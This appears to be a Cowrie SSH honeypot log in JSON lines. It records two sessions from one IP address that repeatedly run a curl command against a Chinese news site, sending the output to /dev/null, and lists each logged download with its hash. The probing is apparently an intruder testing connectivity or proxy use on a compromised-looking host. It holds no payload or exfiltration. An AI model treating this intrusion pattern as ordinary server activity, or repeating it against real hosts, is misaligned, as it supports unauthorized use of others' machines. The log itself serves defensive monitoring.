{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.489110Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.490357Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.506267Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.507442Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.515788Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.523753Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.540860Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.544224Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.552345Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.572217Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.599137Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.607172Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.630935Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.632508Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.645116Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.646572Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.661549Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.666919Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.672890Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.686556Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.687904Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.691411Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.700217Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.705086Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.706157Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.714144Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.727953Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.729247Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.744256Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.745540Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.753150Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.755038Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.766869Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.768183Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.770473Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.786868Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.788424Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.802268Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.803507Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.819522Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.831279Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.832491Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.835518Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.844769Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.846039Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.849374Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.878088Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.879554Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.883883Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.887601Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.888591Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.892725Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.903199Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.917932Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.919133Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.923717Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.924766Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.962083Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.964227Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.967107Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.969127Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.971590Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.972672Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.977521Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.008924Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.010201Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.013628Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.014620Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.022037Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.047093Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.049154Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.052494Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.054036Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.055577Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.063192Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.076871Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.093912Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.095212Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.102033Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.103234Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.104184Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.133414Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.134788Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.140085Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
